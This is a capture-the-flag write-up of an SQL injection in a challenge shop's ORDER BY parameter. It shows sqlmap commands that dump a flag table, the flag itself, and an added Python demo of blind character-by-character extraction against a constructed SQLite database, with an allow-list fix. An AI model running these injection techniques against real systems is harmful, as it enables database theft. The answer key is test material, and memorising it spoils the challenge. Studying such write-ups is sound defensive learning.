---
tags: CTF
---
# ASCIS-2021 Warm-up - 100pts
* Category: Web
* Name: Hitech Shop
* Level: None
* Description: None
## Solution
* Looking over the challenge: it gives us a search box, so I suspected `SQL Injection`.

* I tried a `double quote`, and this is the server response:

* I ran sqlmap with this command: `sqlmap -u http://125.235.240.166:20105/index?order=price --time-sec=200 --user-agent=* --dbs --level 5`
* It found two databases, but only `vannd` is of interest:

* Then I enumerated the tables of `vannd` with `sqlmap -u http://125.235.240.166:20105/index?order=price --tables -D vannd`:
* And there it is, a table called `flag` =))))

* Finally I dumped the columns and contents of the `flag` table with `sqlmap -u http://125.235.240.166:20105/index?order=price --columns -D vannd -T flag --dump`:

* FLAG `ASCIS{SQL_1nJecTi0n_Ba5e_0N_OrdeR_bY}`
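What sqlmap is doing behind the `order=price` parameter, as an added example that is not part of the original writeup and not the challenge's code: the page never shows the server's query or schema, so the `products` table, its rows, and the SQLite backend below are constructed stand-ins (the real target is most likely MySQL, which the `--time-sec` option hints at). Only the flag value is taken from the page. The block shows the vulnerable pattern (sort key pasted into `ORDER BY`), a boolean-based blind oracle built from a `CASE` expression that flips the sort order, a character-by-character extraction of `flag.flag` through that oracle, and the allow-list fix, since `ORDER BY` cannot take a bind parameter.

```python
import sqlite3
import string

# Flag from the writeup; everything else in this database is constructed.
FLAG = "ASCIS{SQL_1nJecTi0n_Ba5e_0N_OrdeR_bY}"


def make_db():
    """Constructed stand-in for the challenge's `vannd` database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        INSERT INTO products(name, price) VALUES
            ('zeta cable', 5), ('mid phone', 300), ('alpha laptop', 900);
        CREATE TABLE flag(flag TEXT);
    """)
    conn.execute("INSERT INTO flag VALUES (?)", (FLAG,))
    return conn


def list_products_vulnerable(conn, order):
    """Assumed shape of /index?order=price: the sort key is pasted into the SQL."""
    sql = f"SELECT name FROM products ORDER BY {order}"
    return [row[0] for row in conn.execute(sql)]


ALLOWED_ORDER = {"price": "price", "name": "name"}


def list_products_safe(conn, order):
    """Hardened form: ORDER BY cannot be bound as a parameter, so the
    user-supplied value only selects a column from an allow-list."""
    column = ALLOWED_ORDER.get(order)
    if column is None:
        raise ValueError(f"unsupported sort key: {order!r}")
    return [row[0] for row in conn.execute(f"SELECT name FROM products ORDER BY {column}")]


def oracle(conn, condition):
    """Boolean-based blind oracle through ORDER BY: when `condition` is true
    every row sorts by price, otherwise by name, and the two orders differ.
    MySQL equivalent (time-based, what --time-sec would drive):
    ORDER BY (SELECT IF((condition), SLEEP(5), price))"""
    baseline = list_products_vulnerable(conn, "price")
    payload = f"(CASE WHEN ({condition}) THEN price ELSE name END)"
    return list_products_vulnerable(conn, payload) == baseline


def extract_flag(conn, charset=string.ascii_letters + string.digits + "{}_"):
    """Recover flag.flag one character at a time through the oracle.
    sqlmap does the same job faster with a binary search on character codes;
    the linear scan here keeps the mechanism visible."""
    result = ""
    position = 1
    while True:
        for ch in charset:
            cond = f"(SELECT substr(flag, {position}, 1) FROM flag) = '{ch}'"
            if oracle(conn, cond):
                result += ch
                break
        else:
            # substr() past the end of the string returns '' and matches nothing
            return result
        position += 1


if __name__ == "__main__":
    db = make_db()
    print("order=price :", list_products_vulnerable(db, "price"))
    print("order=name  :", list_products_vulnerable(db, "name"))
    print("extracted   :", extract_flag(db))
    try:
        list_products_safe(db, "(CASE WHEN (1=1) THEN price ELSE name END)")
    except ValueError as exc:
        print("hardened    :", exc)
```

The oracle only works because the two sort orders (by `price` and by `name`) differ; on a target where they happen to coincide, pick a different pair of columns for the `THEN`/`ELSE` branches or fall back to the time-based form shown in the docstring.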